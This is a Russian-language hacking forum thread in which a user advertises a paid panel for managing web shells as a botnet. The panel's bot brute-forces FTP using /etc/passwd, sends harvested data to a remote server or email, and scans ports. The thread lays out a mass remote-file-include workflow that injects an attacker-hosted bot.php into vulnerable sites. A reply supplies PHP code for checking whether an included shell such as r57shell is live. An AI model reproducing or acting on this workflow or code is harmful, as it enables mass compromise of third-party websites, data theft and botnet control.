][-CMS by [kip]

[kip]

Хочу предложить вашему вниманию связку скриптов для учета web-shell'ов

Состав CMS:
1) bot.php - бот.
2) log.php - скрипт для ведения логов.
3) admin.php - главный скрипт, здесь и будет происходить все веселье

Возможности CMS в целом:
1) Хранение информации о всех ваших web-shell'ов (ботов).
2) Отправка команд всем ботам.
3) Проверка валидности ботов
4) Поддержка модулей.

Возможности bot.php:
1) Собирает инфу о системе.
2) Брутит ftp по данным, взятым из /etc/passwd.
3) Отпрвавка данных на мыло.
4) Отправка данных на удалленный сервер.
5) Скаирование портов.
6) Скрипт узнает какие сайты хостятся рядом.

ver 1.0
Включает в себя:
1) Парсер Google.
2) Маленькая связка скриптов для проверки сайтов на php-include.

Пример: с помощью первого скрипта вы парсите google на какой-нибудь php-include баг(inurl:index.php?page=*.php). Потенциальные файлы сохраняются в текстовый документ.
Далее с помощью связки вы убираете лишний "мусор" из текстового документа и преобразуете url в вид www.somehost.com/index.php?page=http://hacker.народ.ru/bot.php. И последний штрих, вы запускаете скрипт, который обращается ко всем "чистым" url'ам из списка.


Цена ][-CMS by [kip] - 35 wmz
Последющие 2 обновления - бесплатно.
Людям купившим данную CMS до 25,05,06 - скидка в размере 30% на модули.

PS Ожидаемые модули:
1) Модуль для автоматической установки 3proxy на каждом шелле
2) Поиск уязвимостей на определенном сайте (сайтах).

 

[Dude03]

1) bot.php - IMHO бот.

Я не собираюсь покупать СМС(сорри) это идет офффтопом:
для сведения - ИМХО - по моему скромному мнению
1) bot.php - IMHO бот - по моему скромному мнению бот. Гы, смешная фраза, не так ли?

 

[k1b0rg]

За твою CMS я бы не дал больше 2 баксов. 96% модулей и скриптов публичны.
Владея минимальными знаниями языка, оъеюение делаеться за пару минут.

Парсер гугла, гм, ну пару раз он тебе пропарсит, а потом у тебя будет картинка.

>>2) Маленькая связка скриптов для проверки сайтов на php-include.

Имхо грех на этом зарабатывать. Тут же 15 строчек кода от силы. Законектиться к сайту, пропарсить на нужное слово, если найдено то записать в логи. Если попросят я сам напишу такой скрипт.

>>Поиск уязвимостей на определенном сайте

ой, ну я бы не стал это делать на пхп. Пусть меня осудят, но имхо это маразм.

Вообщем, имхо это не тот случай когда за такие скрипты надо брать деньги.

 

[WindowsME]

имхо

ИМХО

Имхо

Ну допустим я прошу: сделай мне. Сделаешь?

 

[k1b0rg]

а чем тебе не нравиться слово имхо?

лови код

function phpinclude($url,$slovo)
{
if(preg_match("/http:\/\/(.*?)\//i",$url,$ret)) $host=$ret[1];
$sock=fsockopen($host,80);
fputs($sock,"GET $url HTTP/1.0
Accept: *\/*
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n\n");
while(!feof($sock))
{
$str=fgets($sock,256);
if(strpos($str,$slovo)<>0) { return 1; }
}}


$url сайт с инклуженном шеллом, а $slovo парсинг по такому то слову.
Если шелл rst то парсь по слову r57shell и т.д. Если не дурак разберешься что к чему